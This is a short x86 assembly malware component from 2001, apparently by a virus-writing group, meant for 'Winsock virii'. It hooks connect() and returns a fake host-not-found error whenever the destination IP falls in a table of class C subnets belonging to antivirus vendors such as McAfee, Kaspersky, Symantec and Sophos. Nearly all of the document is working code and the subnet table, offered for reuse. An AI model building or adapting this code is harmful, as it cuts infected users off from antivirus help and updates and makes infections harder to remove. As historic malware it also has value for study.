; Blocks access to AV sites, to be incorporated into Winsock virii.
;
; Everyone seems to just block DNS names, this takes ALOT of bytes as you
; have to include every AV DNS name, plus it can be completely bypassed if
; the user uses direct IP addresses. What this snippet does is blocking
; access to AV class C subnets, this has alot of advantages, it also works
; when direct IP's are used, it's small as fuck (compared to DNS blocking),
; plus it works on every service the AV site provides (ie. WWW, FTP, SMTP,
; POP3, proxies, etc etc), as AV companies usually lease entire subnets.
; For example, the AVP sites avp.ru, kaspersky.ru, avp2000.com, and
; kasperskylab.ru can all be blocked by using only a 3-byte subnet.
;
; Jan-2001, T-2000/IR - www.immortalriot.cjb.net


WSAHOST_NOT_FOUND       EQU     11001

                ; Just let your connect() hook point to this.

                PUSHAD

                CALL    Get_Delta

                MOV     EDX, [ESP+(10*4)]       ; sockaddr structure of the
                                                ; connect() call.

                MOV     ECX, [EDX+(2*2)]        ; Fetch IP the user wants to
                                                ; connect to.

                SHL     ECX, 8                  ; Strip last octet from IP.

                LEA     ESI, [EBP+(AV_Sub_Nets-START)]

Scan_For_AV_IP: LODSD                           ; Fetch IP from table.
                DEC     ESI                     ; 3 bytes at a time.

                SHL     EAX, 8                  ; Strip unused subnet.
                JZ      Check_Port              ; Last entry in table?

                CMP     ECX, EAX                ; Class C subnet matches?
                JNE     Scan_For_AV_IP          ; If not, repeat loop.

                PUSH    WSAHOST_NOT_FOUND       ; Fake that the IP can't
                CALL    WSASetLastError         ; be found.

                POPAD

                PUSH    -1                      ; Return error to connect().
                POP     EAX

                RETN    (3*4)                   ; Return and dispose of the
                                                ; connect() arguments.


; This table isnt complete, but covers most AV WWW sites.
AV_Sub_Nets:    DB      161,069,003         ; nai.com
                DB      216,122,008         ; avp.com
                DB      195,170,248         ; avp.ru, kaspersky.ru, avp2000.com, kasperskylab.ru
                DB      193,247,150         ; avp.ch, metro.ch
                DB      194,252,006         ; datafellows.com, f-secure.com
                DB      195,112,025         ; drsolomon.com
                DB      208,228,231         ; mcafee.com
                DB      194,203,134         ; sophos.com
                DB      146,145,148         ; norman.com
                DB      206,204,003         ; pandasoftware.com
                DB      193,004,210         ; complex.is
                DB      203,037,250         ; leprechaun.com.au
                DB      141,202,248         ; cai.com
                DB      216,033,022         ; antivirus.com, trendmicro.com
                DB      216,035,137         ; sarc.com
                DB      216,086,104         ; virus.com
                DB      212,029,228         ; invircible.com
                DB      208,226,167         ; symantec.com
                DB      207,227,040         ; grisoft.com
                DB      194,105,193         ; drweb.ru
                DB      000,000,000         ; end of table.

                ; Small, but very effective.